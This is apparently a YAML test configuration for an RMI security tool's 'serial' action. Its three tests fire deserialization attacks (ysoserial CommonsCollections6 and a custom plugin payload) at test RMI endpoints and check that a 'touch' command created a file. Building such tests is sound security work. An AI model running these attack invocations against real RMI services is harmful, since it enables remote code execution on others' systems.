tester:
  title: Method Tests
  description: |-
    'Perform tests for the serial action on custom RMI endpoints.'

  id: '001-009'
  groups:
    - method
    - plugin
    - serial
  id_pattern: '001-009-{:03}'


variables:
  file: jdk8-method-rce-test.txt


plugins:
  - os_command:
      cmd:
        - /bin/bash
        - ../../../plugins/build.sh
        - ../../../target/${rmg}
        - ../../utils/PluginTest.java
        - ../../utils/PluginTest.jar


tests:
  - title: Gadget Call
    description: |-
      'Performs a deserialization attack on the system function of the'
      'plain-server object.'

    groups:
      - ysoserial

    command:
      - rmg
      - serial
      - ${TARGET}
      - CommonsCollections6 
      - 'touch ${volume-d}/${file}'
      - --signature
      - 'String system(String dummy, String[] dummy2)'
      - --bound-name
      - plain-server
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - java.lang.String[]
            - Caught ClassNotFoundException
            - deserialize canary
            - probably worked
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${file}'


  - title: Gadget Call (Legacy)
    description: |-
      'Performs a deserialization attack on the releaseRecord function of the'
      'legacy-service object.'

    groups:
      - ysoserial

    command:
      - rmg
      - serial
      - ${TARGET}
      - CommonsCollections6 
      - 'touch ${volume-d}/${file}'
      - --signature
      - 'void releaseRecord(int recordID, String tableName, Integer remoteHashCode)'
      - --bound-name
      - legacy-service
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - java.lang.Integer
            - Caught ClassNotFoundException
            - deserialize canary
            - probably worked
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${file}'


  - title: Plugin Call
    description: |-
      'Uses a plugin as payload provider that returns the string that was specified'
      'as agument. This is used on the execute method of the plain-server bound name'
      'to verify code execution.'

    groups:
      - payload-provider

    command:
      - rmg
      - serial
      - ${TARGET}
      - custom 
      - 'touch ${volume-d}/${file}'
      - --signature
      - 'String execute(String dummy)'
      - --bound-name
      - plain-server
      - --plugin
      - ../../utils/PluginTest.jar
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - java.lang.String
            - Caught ClassNotFoundException
            - deserialize canary
            - probably worked
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${file}'
